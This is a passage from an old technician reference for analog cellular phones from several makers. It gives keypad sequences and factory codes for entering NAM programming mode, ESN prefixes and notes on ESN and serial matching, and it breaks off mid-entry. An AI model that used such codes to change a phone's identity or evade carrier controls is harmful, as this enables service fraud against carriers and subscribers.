------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Clarion Programmer: Handset ESN Prefix DEC: 166 HEX: A6 ESN, S/N Match Required: Yes Available Channels: 832 Programming Sequence: Power On (Err 3 may be displayed if phone has not been programmed) Press CLR + * + * + 123123 + # + # (within 10 seconds) 0 will be displayed Select NAM 1 thru 3 by entering 1, 2 or 3 Press RCL + step number + enter new information + STO (for each step) (To enter unlock code 123; RCL + ) + 123 + STO) Power OFF to exit program mode Unlock Code: 3or4 XXX or XXXX + STO System ID Format: 5 XXXXX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Mobile Number: 10 XXX-XXX-XXXX + STO Station Class: 2 08 + STO Initial Paging Channel: 3 333 or 334 + STO Access Overload Class: 2 XX + STO Preferred System: 1 1(A) or 0(B) + STO Group Id Format: 2 XX + STO Power OFF to exit program mode. ------------------------------------------------------------------------------- CLARION 5100CT and 5200CT ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Clarion Programmer: Keypad ESN Prefix DEC: 166 HEX: A6 ESN, S/N Match Required: Yes Stamped Model Number: None (handset is labeled 5100CT or 5200CT) Available Channels: 832 Programming Sequence: Power On (Err 3 may be displayed if phone has not been programmed) Press CLR + * + * + 123123 + # + # (within 10 seconds) 0 will be displayed Select NAM 1 thru 3 by entering 1, 2 or 3 Press RCL + step number + enter new information + STO (for each step) (to enter station class; RCL + 5 + 08 + STO) Power OFF to exit program mode Unlock Code: 3or4 XXX or XXXX + STO System ID Format: 5 XXXXX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Mobile Number: 10 XXX-XXX-XXXX + STO Station Class: 2 08 + STO Initial Paging Channel: 3 333 or 334 + STO Access Overload Class: 2 XX + STO Preferred System: 1 1(A) or 0(B) + STO Group ID Format: 2 XX + STO Power OFF to exit program mode. Display ESN: FCN + 6 Horn Alert: FCN + 8 + "+ or -" New Unlock Code: NAM System Select: FCN + 4 + "+ or -" (to scroll choices) + STO ------------------------------------------------------------------------------- CMTELECOM AR 3800 mobile/transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: CMTELECOM ESN Prefix DEC: 153 HEX: 99 ESN, Serial Number Match: yes Programming Sequence: Power ON Lock Phone: FUNC + 1 + 1 (press 1 until "F-Lock" displays) + SND Enter Password: * + 5965 ("Conf 3800" will display, else enter Password * + 0188) Press VOL UP or DOWN keys to increment steps RCL + 2 digit step # to reach specific parameters SND must be pressed to save info after each step To store complete NAM info press END Step # of digits 1 Mobile Number 1: 10 XXX-XXX-XXXX + SND + VOL UP 2 System ID 1: 5 XXXXX + SND + VOL UP 3 Init. paging ch 1: 3 333 or 334 + SND + VOL UP 4 Access Overload 1: 2 XX + SND + VOL UP 5 Group ID 1: 2 XX + SND + VOL UP 6 Local Use 1: 1 1(SND to toggle) + VOL UP 7 System Select 1: 1 0 = 0 + SND + VOL UP 1 = BA + SND + VOL UP 2 = A only + SND + VOL UP 3 = B only + SND + VOL UP 4 = Home + SND + VOL UP 8,9 Not Used (VOL UP) 10 Mobile Number 2: 10 XXX-XXX-XXXX + SND + VOL UP 11 System ID 2: 5 XXXXX + SND + VOL UP 12 Init pagin Channel: 3 333 or 334 + SND + VOL UP 13 Access Overload 2: 2 XX + SND + VOL UP 14 Group ID 2: 2 XX + SND + VOL UP 15 Local use 2: 1 1 (SND to toggle) + VOL UP 16 System Select 2: 1 0 = AB + SND + VOL UP 1 = BA + SND + VOL UP 2 = A Only + SND + VOL UP 3 = B Only + SND + VOL UP 4 = Home + SND + VOL UP 17 Future Use: 1 0 + SND + VOL UP 18 Power Save: 1 0(Dis) or 1(Enable) + SND + VOL UP 19 System ID: 5 XXXXX + SND + VOL UP 20 Prog Password: 5 Leave at Factory Set Number + VOL UP Horn Alert: FUNC + 4 + SND New Unlock Code: NAM System Seltect: FUNC + (ALPHA to scroll) PrefA AB PrefB BA Only A Only B Only H Home SND to enter selection CLR to exit ------------------------------------------------------------------------------- DIAMONDTEL (MITSUBISHI) MESA 52 and 55 (Handset Programming) ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacter: Mitsubishi Programmer: Handset (phone can also be porgrammed with NAM, see MESA 40, 50, 52 and 55 programming) ESN Prefix DEC: 134 Hex: 86 ESN, S/N Match Required: Yes Available Channels: 666 Programming Sequence: Power On (hold for 1 second) Depress and hold CLR while keying 1951426 or 8291112 (if phone has been porgrammed 3 times) must be entered within 10 seconds Press SEND to enter data and increment CLR may be used to correct an entry Write NAM information with END key Mobile Number: 10 XXX-XXX-XXXX + SEND Security Code: 3 XXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 oe 334 + SEND Access Overload Class: 2 XX + SEND Preferred System: 1 0 (B) or 1 (A) + SEND Group ID Format: 2 XX + SEND End-to-End Signalling: 1 1 + SEND Handsfree Option: 1 1 (if equipped) + SEND Roam Inhibit: 1 0 or 1 + SEND Aux Option1: 2 00 to 07 + SEND (see bottom) Aux Option2: 2 00 ro 07 + SEND (see bottom) Aux Option1 Second Non-Resettable Extended DTMF Handset Cumulative Timer 01 x x 02 x 03 x x 04 x 05 x x 06 x x 07 x x x Aux Option2 Cumulative Timer Increment 00 60 seconds 01 30 seconds 02 20 seconds 03 15 seconds 04 12 seconds 05 10 seconds 06 6 seconds 07 1 second Horn Alert: FCN + 4 New Unlock Code: FCN + 1 + 3-digit security code (current unlock code will appear) + new 3-digit unlock code + CLR System Select: FCN + # + # + #, etc. (the following will be displayed): Pref A Pref B Only A Only B H Only Press CLR to enter selection and exit. ------------------------------------------------------------------------------- DIAMONDTEL (MITSUBISHI) MESA 40, 50, 51 and 55 (NAM Program) ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Mitsubishi Programmer: Motorola 1801 -- Celnam, Curtis, or Handset (51 and 55 only) ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Programmable Handset: 52 and 55 only Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: FCN + 4 New Unlock Code: FCN + 1 + 3-digit security code (current Unlock Code will appear) + new 3-digit Unlock Code + CLR System Select: STO + # + # + # etc.. (one of the following will appear) AAABBB or BBBAAA Standard BBBAAA or AAABBB Alternate C50A Home A only C50B Home B only AAAAAA A only BBBBBB B only Press CLR to enter selection and exit. ------------------------------------------------------------------------------- DIAMONDTEL MESA 60, 60X and 80X portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/M Match Required: No Programmble Handset: Yes Available Channels: 666 Programming Sequence: Power On (END/FCN + 0, simultaneously) Hold CLR and enter 6926232 (within 10 seconds) Enter step infomation then press SND Press END to write NAM infomation Mobile Number: 10 XXX-XXX-XXXX Security Code: 4 XXXX System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 0 (B) or 1 (A) Group ID Format: 2 XX End-to-End Signalling: 1 1 Roam Inhibit: 1 0 A/B Selectable: 1 1 Auto Lock: 1 0 Aux: 1 0 New Unlock Code: FCN + STO + 4-digit security code (NAM) + new 3-digit unlock code System Select: FCN + 1 + X X=0 AB or BA Standard X=1 BA or AB Alternate X=2 Home X=3 Pref Only X=4 Non-Pref Only ------------------------------------------------------------------------------- DIAMONDTEL MESA 90X and 99X portables ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Programmable Handset: Yes Programming Sequence: Power On Depress and hold END while inputting 5132920 or 6972814 (must be input within 10 seconds) Enter information for each step then press SEND to increment Press END to write NAM infomation Dual Number: 1 0 (1 number) or 1 (2 numbers) + SEND Mobile Number: 10 XXX-XXX-XXXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 333 or 334 + SEND Access Overload Class: 2 XX + SEND Preferred System: 1 0 (B) or 1 (A) + SEND Group ID Format: 2 XX + SEND Roam Inhibit: 1 0 + SEND VOX (DTX): 1 (0 or 1) + SEND 2 Mobile Number: 10 XXX-XXX-XXXX + SEND 2 System ID Format: 5 XXXXX + SEND 2 Local Use Option: 1 1 + SEND 2 MIN Option: 1 1 + SEND 2 Initial Paging Channel: 4 0333 or 0334 + SEND 2 Access Overload Class: 2 XX + SEND 2 Preferred System: 1 0 (B) or 1 (A) + SEND 2 Group ID Format: 2 XX + SEND 2 Roam Inhibit: 1 (0 or 1) + SEND 2 VOX (DTX): 1 (0 or 1) + SEND 2 Auto Retry: 1 (0 or 1) + SEND Security Code: 4 XXXX + SEND End-to-End Signalling: 1 1 + SEND Continuous DTMF: 1 (0 or 1) + SEND Auto Lock: 1 (0 or 1) SEND Booster: 1 0 + SEND Audible Timer: 1 (0 or 1) + SEND Press END to exit program mode. ------------------------------------------------------------------------------- DIAMONDTEL MESA 92 transportable/portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Stamped Model # : 1st 2 digits of serial # are 92 Programmable Handset: Yes Avialable Channels: 832 Programming Sequence: Power On Depress and hold END while inputting 1951426 or 8291112 (if phone has been programmed 3x) enter within 10 seconds Enter infomation for each step then press SEND to increment Press END to write NAM information # of digits Dual Number: 1 0 (1 number) or 1 (2 numbers) + SEND Mobile Number: 10 XXX-XXX-XXXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 or 0334 + SEND Access Overload Class: 2 XX + SEND Group ID Format: 2 XX + SEND Timer increment: 1 0 + SEND (if Dual Number was 0 then skip 2nd programming sequence) 2 Mobile Number: 10 XXX-XXX-XXXX + SEND 2 System ID Format: 5 XXXXX + SEND 2 Local Use Option: 1 1 + SEND 2 MIN Option: 1 1 + SEND 2 Initial Paging Channel: 4 0333 or 0334 + SEND 2 Access Overload Class: 2 XX + SEND 2 Group ID Format: 2 XX + SEND 2 Timer increment: 1 0 + SEND Security Code: 4 XXXX + SEND VOX: 1 (0 or 1) + SEND Roam Inhibit: 1 (0 or 1) + SEND Continous Tone: 1 (0 or 1) + SEND Disable Cumulative: 1 (0 or 1) + SEND Disable ignition sense: 1 (0 or 1) + SEND Disable own # display: 1 (0 or 1) + SEND SID Lockout: 1 (0 or 1) + SEND Dual Handset: 1 (0 or 1) + SEND RJ11 Option: 1 (0 or 1) + SEND Press END to exit Program mode. New Unlock Code: FCN + 7 + 4-digit security code (NAM) + new 3-digit unlock code System Select: FCN + 1 + x X=0 AB or BA Standard X=1 BA or AB Alternate X=2 Home X=3 Pref only X=4 Non-Pref only Press CLR to exit. ------------------------------------------------------------------------------- DIAMONDTEL MESA 95 transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On Depress and hold END while inputting 1951426 or 8291112 (if phone has been programmed 3x) Enter information for each step then press SEND to increment Press END to write NAM information # of digits Dual number: 1 0 (1 number) or 1 (2 numbers) + SEND Mobile Number: 10 XXX-XXX-XXXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 or 0334 + SEND Access Overload Class: 2 XX + SEND Preferred System 1: 1 (0) B or 1 (A) + SEND Group ID Format: 2 XX + SEND Timer Increment: 1 0 (0-7) + SEND (if Dual Number was 0 then skip 2nd NAM programming) 2 Mobile Number: 10 XXX-XXX-XXXX + SEND 2 System ID Format: 5 XXXXX + SEND 2 Local Use Option: 1 1 + SEND 2 MIN Option: 1 1 + SEND 2 Initial Paging Channel: 4 0333 or 0334 + SEND 2 Access Overload Class: 2 XX + SEND 2 Preferred System: 1 0(B) or 1(A) + SEND 2 Group ID Format: 2 XX + SEND 2 Timer increment: 2 0(0-7) + SEND Security code: 4 XXXX + SEND End-to-End Signaling: 1 1 + SEND VOX: 1 0 (0 or 1) + SEND Handsfree: 1 0 (0 or 1) + SEND Roam Inhibit: 1 0 (0 or 1) + SEND Continuous Tone: 1 0 (0 or 1) + SEND Disable Cumulative: 1 0 (0 or 1) + SEND Disable Ignition sense: 1 0 (0 or 1) + SEND Dual Handset: 1 0 (0 or 1) + SEND New Unlock Code: FCN + 1 + 4-digit security code (NAM) + new 3-digit unlock code + CLR Syetm Select: FCN + # + # (press CLR to select) ------------------------------------------------------------------------------- FUJITSU F80M-360 ------------------------------------------------------------------------------- NAM Type: Fujitsu (PROM) Manufacturer: Fujitsu Programmer: Curtis or Bytek ESN Prefix DEC: 133 HEX: 85 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX System ID Format: XXXXX Horn Alert Option: 1 Handsfree Option: 0 (disable) or 1 (enable) End-to-End Signalling: 1 Repertory Option: 1 Group ID Format: XX Access Overload Class: XX Station Class: 00 Local Use: 1 MIN Option: 1 Initial Paging Channel: 333 or 334 Preferred System: 0 (B) or 1 (A) Determine software version from IC 2 on logic board befroe setting the option bits. Last three digits on the PROM will be 003 or 004 to indicate the software level. Option Bits for Hex Address 13 Bit Curtis Software Software Location Location Version 003 Version 004 B0 37 Call in absence Call in Absence B1 38 Expanded Memory Lock Feature (00-39) Bit-A B2 39 DTMF from memory Lock Feature Locations (30-39) Bit-B B3 40 System Select Not used B4 41 Not used Expanded memory (00-39) B5 42 Not used DTMF from memory Location (30-39) B6 43 Not used Call Timer Bit A B7 44 Not used Call Timer Bit B Lock Feature Call timer Bit A Bit B Bit A Bit B 0 0 Outgoing 0 0 6 seconds 0 1 Incoming 0 1 15 seconds 1 0 Auto Outgoing 1 0 30 seconds 1 1 Auto Incoming 1 1 60 seconds ------------------------------------------------------------------------------- FUJITSU 362 (COMMANDER) and 362A (COMMANDER II) ------------------------------------------------------------------------------- NAM Type: Fujitsu Manufacturer: Fujitsu Programmer: Curtis or Bytek ESN Prefix DEC: 133 HEX: 85 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX or XXXX System ID Format: XXXX Horn Alert Option: 1 Handsfree Option: 0 (Enabled from handset) End-to-End Signalling: 1 Repertory Option: 1 Group ID Format: XX Access Overload Class: XX Station Class: 0000 Local Use Option: 1 MIN Option: 1 Initial Paging Channel: 333 or 334 Preferred System: 1 (A) or 0 (B) Horn Alert: F + # (Aux) New Unlock Code: NAM System Select: F + 1 + X X=1 (A then B) X=2 (B then A) X=3 (A Only) X=4 (B Only) X=5 (home) ------------------------------------------------------------------------------- FUJITSU 364 (COMMANDER IIX) and 170 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 133 HEX: 85 ESN, S/N Match Required: Yes (manufacturer prefix + last 4 or 5 digits) Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On F + LOCK Power Off Power On # + 626 + # + 7764726 (within 10 seconds) Hold * key until tone stops Enter data for each step then press STOR Press SEND to write data # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (mobile) 14 (portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1 (A) or 0 (B) Group ID Format: 2 XX Lock: 3 or 4 Call Timer: 1 4 Auto Lock: 1 1 Call Restriction: 1 1 Call Timer - 1 Timer Off 2 6-seconds 3 30-seconds 4 60-seconds Auto Lock - 1 Manual lock, no out 2 Manual lock, no calls 3 Auto lock, no out 4 Auto lock, no calls Call Restriction - 1 No restriction 2 No memory dialing 3 No long-distance 4 Both 2 and 3 5 memory calls only Programming steps for NAMs 2 thru 4: Power On Unlock phone (if locked) F + 7 + (NAM 2, 3 or 4) F + LOCK Power Off Power On Follow programming code and steps from top Horn alert (364 only): F + #/AUX New Unlock Code: NAM System Select: F + 1 + X X=1 AB Pref A X=2 BA Pref B X=3 A Only X=4 B Only X=5 Home To confirm setting, press RCL + F + X ------------------------------------------------------------------------------- FUJITSU 364A (ST, LT, FX, DX, and XL) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 133 HEX: 85 ESN, S/N Match Required: Yes Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On F + LOCK Power Off Power On # + 626 + # + 7764726 (within 10 seconds) Hold * key until tone stops Enter data for each step then press STOR Vol UP or DN arrows can be used to scroll Press SEND to write data # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 Min Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (mobile) 14 (portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1 (A) or 0 (B) Group ID Format: 2 XX Unlock Code: 3 or 4 Call Timer: 1 4 Call Restriction: 1 1 System ID Inhibit #: 5 XXXXX System ID Inhibit #: 5 XXXXX System ID Inhibit #: 5 XXXXX Call Timer Increment - 1 Timer Off 2 6-seconds 3 30-seconds 4 60-seconds Auto Lock - 1 Manual Lock, no out 2 Manual Lock, no calls 3 Auto Lock, no out 4 Auto Lock, no calls Call Restriction - 1 No restriction 2 No memory dialing 3 No long-distance 4 Both 2 and 3 5 Memory calls only Programming Instructions NAMs 2 thru 4: Power On Unlock phone (if locked) F + 7 + (NAM 2, 3, or 4) F + LOCK Power Off Power On Follow programming code from above Horn alert: F + # New Unlock Code: NAM System Select: F + 1 + X X=1 AB Pref A X=2 BA Pref B X=3 A only X=4 B only X=5 Home To confirm setting, press RECL + F + X ------------------------------------------------------------------------------- FUJITSU Pocket Commander ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 133 HEX: 85 ESN, S/N Match Required: Yes Stamped Model number: F80P-171 Available Channels: 832 Programming Sequence: Power On F + LOCK Power Off Power On # + 626 + # + 7764726 (within 10 seconds) Hold * key until tone stops Enter data for each step then press STOR Vol UP or DN arrows can be used to scroll Press SEND to write data # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (mobile) or 14 (portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1 (A) or 0 (B) Group ID Format: 2 XX Unlock Code: 3 or 4 Call Timer: 1 4 Call Restriction: 1 1 System ID Search: 5 XXXXX System ID Inhibit #: 5 XXXXX Call Timer Increment - 1 Timer Off 2 6 seconds 3 30 seconds 4 60 seconds Auto Lock - 1 Manual Lock, no out 2 Manual Lock, no calls 3 Auto Lock, no out 4 Auto Lock, no calls Call Restriction - 1 No restriction 2 No memory dialing 3 No long-distance 4 Both 2 and 3 5 Memory calls only Programming instructions NAMs 2 thru 4: Power On Unlock phone (if locked) F + 7 + (NAM 2, 3 or 4) F + LOCK Power Off Power On Follow programming code from above Horn Alert: F + # New Unlock Code: NAM System Select: F + 1 + X X=1 AB Pref A X=2 BA Pref B X=3 A only X=4 B only X=5 Home To confirm setting, press RECL + F + X ------------------------------------------------------------------------------- GATEWAY CP900 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Gateway Programmer: Keypad ESN Prefix DEC: 147 HEX: 93 ESN, S/N Match Required: Yes Stamped Model Number: CP900 Available Channels: 832 Programming Sequence: Power Off Power On Press MENU ("Enter Number" will be displayed) Enter 0 + 9 (ON or OFF will be displayed) Select NAM 1 or 2: OFF - NAM 1 ON - NAM 2 Press VOL UP or DOWN to toggle choices Press CLR Press MENU + 9 + 9 + current unlock code (factory preset 9999) PROGRAM NAM will be displayed Enter each parameter then press SEND/ANSWER to increment Once the last step in entered and SEND/ANSWER is pressed, the phone is automatically programmed END may be pressed at any time to exit changing the data # of digits System ID Format: 6 XXXXXX + SEND/ANSWER Mobile Number: 10 XXX-XXX-XXXX + SEND/ANSWER Initial Paging Channel: 4 0333 or 0334 + SEND/ANSWER Access Overload Class: 2 XX + SEND/ANSWER Group ID Format: 2 XX + SEND/ANSWER MIN Option: 1 1 + SEND/ANSWER Local Use Option: 1 1 + SEND/ANSWER System Select: 1 1 (A) or 2 (B) + SEND/ANSWER Phone is programmed when the final step is entered New Unlock Code: MENU + 0 + 5 + current 4-digit unlock code + new 4-digit unlock code + CLR System Select: MENU + 0 + 8 + VOL UP or DOWN (to scroll choices) A only B only Normal Home Press CLR to exit. ------------------------------------------------------------------------------- GE CF1000, CF2000, 3000 series, 4000 series, EXECUTIVE XR & MONOGRAM XR ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: GE Programmer: Handset ESN Prefix DEC: 146 HEX: 92 ESN, S/N Match Required: Yes Programmable Handset: Yes Available Channels: GE1000 & 2000 - 666 GE3000 & 4000 EXECUTIVE XR & MONOGRAM XR - 832 Programming Sequence: Power On Hold CLR while inputting 923885 (within 10 seconds) ESN will be displayed Press SEND to enter data and increment Press END to write NAM information # of digits Mobile Number: 10 XXX-XXX-XXXX Unlock Code: 3 XXX System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 0 (B) or 1 (A) Group ID Format: 2 XX Horn Alert: 1 1 Handsfree Option: 1 0, 1 or 2 (MONOGRAM H/F) Alternate Lock: 3 Don't use same code as unlock Dual NAM: 1 0 (1 NAM) 1 (2 NAM) Horn Alert (if equipped): Press and hold END key. While holding END key, depress 9. On most models, this feature does NOT cancel when the ignition is turned on. New Unlock Code: NAM System Select: Press and hold END key. While holding END key, depress 4. Use volume rocker button to step through selections 0 Pref then Non-Pref 1 Pref only 2 Home only 3 Preferred Roam only 4 Non-Pref then Pref 5 Non-Pref only Press CLR to exit. ------------------------------------------------------------------------------- GE MINI II ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: keypad ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: Yes Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On Depress and hold ENd while inputting 6282905 (enter within 10 seconds) Enter information for each step then press SEND to increment (CLR to correct before SEND) Press END to write NAM information # of digits Dual Number: 1 0 (1 NAM) 1 (2 NAMs) + SEND Mobile Number: 10 XXX-XXX-XXXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 or 0334 + SEND Access Overload Class: 2 XX + SEND Preferred system 1: 1 0 (B) or 1 (A) + SEND Group ID Format: 2 XX + SEND Roam Inhibit 1: 1 0 or 1 (normal 0) Discontinous Trans 1: 1 0 or 1 Automatic Retry 1: 1 0 or 1 (if 2 NAMs were set, you will repeat the above steps) Security Code: 4 XXXX + SEND End-End Signaling: 1 1 + SEND Continuous DTMF: 1 0 or 1 Automatic Lock: 1 0 or 1 Announce Beep: 1 1 Booster Option: 1 0 or 1 New Unlock Code: FCN + 7 + 4-digit security code (NAM) + new 3-digit unlock code + CLR System Select: FCN + 1 + X X=0 Standard X=1 Alternate X=2 Home X=3 Pref (A only/B only) X=4 Non-Pref (B only/A only) Press END to write data into NAM ------------------------------------------------------------------------------- GE STAR ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: GE Programmer: Motorola - Celnum or Curtis ESN Prefix DEC: 146 HEX: 92 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Manufacturer Options: Hex Address B7 B0 13 0 1 0 1 0 0 0 0 14 1 1 0 0 0 0 0 0 Description Options: Adress 13 - B6 External Repertory memory B4 DTMF Format Adress 14 - B7 Clock B6 Call timer Horn Alert: Press and hold END key. While holding END key, depress 9. This feature does not cancel when ignition is turned on. New Unlock code: NAM System Select: Press and hold END key. While holding END key, depress 4. Use volume rocker button to step through selections. 0: Pref then non-pref 1: Pref only 2: Home only 3: Preferred Roam Only 4: Non-Pref then Pref 5: Non-Pref only ------------------------------------------------------------------------------- GOLDSTAR GM/GT 5000 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: GOLDSTAR Programmer: Handset ESN Prefix DEC: 141 HEX: 8D ESN, S/N Match Required: Yes Stamped Model Number: GM5000 or GT5000 Number of Channels: 832 Programming Sequence: Power On FCN + 4 + * (to select NAM) Enter Program Code: FCN + 99 + * ("Enter Code" will display) + 1234567890 + MEM Code must be entered within 30 seconds Mobile Number will display Press MEM after entering each parameter to Store Once Parameter is stored, press Scroll UP or DN to view next parameter Press CLR key to exit program mode WITHOUT changing any parameters # of digits Mobile Number: 10 XXX-XXX-XXXX + MEM System ID: 5 XXXXX + MEM Initial Page Channel: 3 333 or 334 + MEM Access Overload: 2 XX Unlock Code: 4 XXXX Security Code: 6 XXXXXX + MEM Theft Alarm Disable: 4 XXXX + MEM Preferred System: 1 0 (B) or 1 (A) + MEM Station Class: 1 0 + MEM Handsfree: 1 0 (Disable) or 1 (Enable) + MEM Local Use: 1 1 + MEM MIN Option: 1 1 + MEM Horn Alert: 1 1 + MEM Optional Speaker: 1 1 + MEM "Save to NAM?" will display, press MEM to save NAM or CLR to exit. Horn Alert: FCN + 1 + Vol UP (To Scroll) "Horn Alert" will display, + * (To toggle) + MEM (to store) + Turn Ignition Off New Unlock Code: NAM System Select: FCN + 2 + 6 digit security Code + MEM + Vol UP or DOWN(to scroll) "System Select" will display + * (To toggle) A Non-wireline, B Wireline A/B Pref non-wireline, B/A Pref wireline Home Press MEM (to store) Press CLR (to exit) ------------------------------------------------------------------------------- GLENAYRE GL300 ------------------------------------------------------------------------------- See AT&T 1300 ------------------------------------------------------------------------------- GTE METAL SERIES ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Sun Moon Star Programmer: Motorola 1801 - Celnum, Bytek, Curtis ESN Prefix DEC: 178 HEX: B2 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 832 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX or XXXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled (if equipped) Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert option: Enabled System ID Format: XXXXX Preferred system: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 08 Manufacturer Options: Hex Address B7 B0 13 X 0 0 0 0 X X X Hex Address 13 - B7 16-digit dial from memory if enabled or 32-digit dial if 0 is entered. B2 Program with 1 to enable special lock. B1 Program with 1 to enable partial lock. B0 Program with 1 to enable roam inhibit. To disable any feature listed above, program bit with a zero. Horn alert: F + 7 New Unlock code: NAM System Select: F + 5 + X X=1 Standard (AB or BA) X=2 Alternative (BA or AB) X=3 Non Pref only X=4 Pref only X=5 Home ------------------------------------------------------------------------------- HARRIS 4000 SERIES ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Harris Programmer: Motorola, Celnam, Curtis, Bytek ESN Prefix DEC: 137 HEX: 89 ESN, S/N Match Required: Yes Programmable Handset: No Avaliable Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: Celebrity -- SEL + 0 CellPhone -- HORN (switch) Custom -- STANDBY New Unlock Code: NAM System Select: Celebrity -- SEL + * + * (Repeat until one of the following appears:) A Pref (AB) B Pref (BA) A Only B Only CellPhone -- SEL + * (AB) SEL + # (BA) SEL + 0 + * (A only) SEL + 0 + # (B only) Custom -- Press A/B switch repeatedly. One of the following will appear: A Pref (AB) B Pref (BA) A Only B Only H Only (Home) ------------------------------------------------------------------------------- HITACHI CR-111H transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Hitachi Programmer: Handset ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Available Channels: 832 Programming Sequence: Power On Select a NAM (A or B): A-FCN 621# FCN, B-FCN 622# FCN Enter Programming Mode with FCN 626 RCL Enter Data at each step then press Up of Down Write NAM with FCN 626 STO # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 System Select H/S: 1 1 Roam Inhibit: 1 0 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (mobile) or 14 (portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1 (A) or 0 (B) Group ID Format: 2 XX Unlock Code: 3 or 4 End-to-End Signaling: 1 1 Handsfree: 1 0 or 1 Horn Alert: N/A New Unlock Code: NAM System Select: FCN + 9 + DOWN (DOWN to scroll system prompts) Enter Options: STO + FCN ------------------------------------------------------------------------------- HITACHI CR-2110H portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Hitachi 